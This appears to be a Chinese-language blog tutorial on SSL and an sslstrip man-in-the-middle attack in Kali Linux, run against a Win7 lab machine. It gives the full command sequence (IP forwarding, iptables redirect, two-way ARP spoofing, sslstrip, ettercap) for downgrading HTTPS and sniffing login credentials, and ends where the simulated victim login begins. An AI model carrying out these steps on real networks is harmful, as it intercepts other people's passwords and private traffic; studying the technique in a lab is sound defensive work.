平时我们上网的过程中,经常会发现浏览器中的地址栏前面有个http或者https,这个是web请求时指定的协议 。默认情况下,使用HTTP开头的,这个网站上的通信就不会被加密,也就是明文传输;如果是HTTPS,那么不仅加密了,而且攻击时还会在网页中提示证书风险提示,这样就会引起用户的疑心 。本节课我们来学习下SSL原理和kali中的sslstrip攻击,你也能速度掌握这些黑客干货!
什么是SSL
SSL的作用是为了传输敏感信息(比如凭证、账号密码)提供安全可靠的保障,确保用户使用浏览器和远程服务器之间传输的数据是安全可信的,传输的数据不会被恶意窃取 。当我们访问一个HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并附带证书验证,在得到双方证书有效的前提下,从此两者开始进行SSL安全通信!传输的数据就得到了安全保障!
比如访问一个HTTPS类型的网页,登录个人账号,如果这个网页返回的证书验证没能和浏览器收录的证书匹配,就会弹出证书风险提示,假如进一步继续访问,你输入的用户和密码就不再安全,很有可能被窃取!
文章插图
嗅探https登录密码基本所有的HTTPS网页比如:https://www 。baidu 。com,都会采用ssl证书加密机制,这是为了用户的隐私安全不被攻击者明文窃取 。上一节课我使用http网页直接能嗅探到用户登录网页的用户密码,如果是https网页,在不使用伪装欺骗技术的前提下,账号是无法窃取,而且还会提示证书风险提示 。
那如何绕过ssl进行嗅探https网页提交的个人账号信息呢?
文章插图
- 嗅探原理:
攻击主机:kali主机 192.168.31.251,进入su root用户下操作!如何在kali中安装sslstrip,可以点击>>《白帽黑客kali渗透指南》前往专栏课程学习,视频实战指导更加完整详细,小白入门到实战轻轻松松!
靶机:Win7 192.168.31.16
网络环境:桥接网络
工具sslstrip:kali2020是没有默认安装的,需要自行安装
文章插图
- 开启kali的路由转发,终端下输入:
echo 1 > /proc/sys/net/ipv4/ip_forward意思是往ip_forward文件写入数值1,开启路由转发!
文章插图
- 开启iptables规则
在kali下新建终端,输入:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000- 在kali中开启ARP欺骗
arpspoof -i eth0(网卡) -t 192.168.31.16(目标IP) 192.168.31.1(网关)
文章插图
在新的终端下输入:
arpspoof -i eth0(网卡) -t 192.168.31.1(网关) 192.168.31.16(目标)
文章插图
如果你已经安装了sslstrip,那么看下面实战!
- Kali中开启sslstrip攻击
sslstrip -a -f -k此时已经成功开启了sslstrip攻击,就会自动将https ssl加密转换为http明文形式 。
文章插图
为了使用直白的形式在终端中打印嗅探捕获到的用户账号和密码,可以开启ettercap捕获 。
新建终端,输入:
ettercap -Tq -i eth0如图,等待对方在https网页中输入用户名和密码!
文章插图
- 模拟win7靶机在https网页中输入个人账号!
推荐阅读
- IIS+MySQL+PHP+Phpmyadmin配置Web站点之Mysql安装
- web/vue/react/ng后台管理系统前端开发,富文本编辑器没个省心的
- 常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御
- websocket连接太多导致服务器卡顿怎么办?一招轻松实现横向扩展
- WebSocket 协议初探
- 渗透成功后收集目标系统的信息
- 渗透攻击实例-完整的实战演练
- 最新macOS破坏SSH默认规则,程序员无法登录Web服务器
- 大黑客教你如何手工渗透测试Web应用程序!!
- 一台服务器部署ShareWAF,后面接多台Web服务器,该如何配置?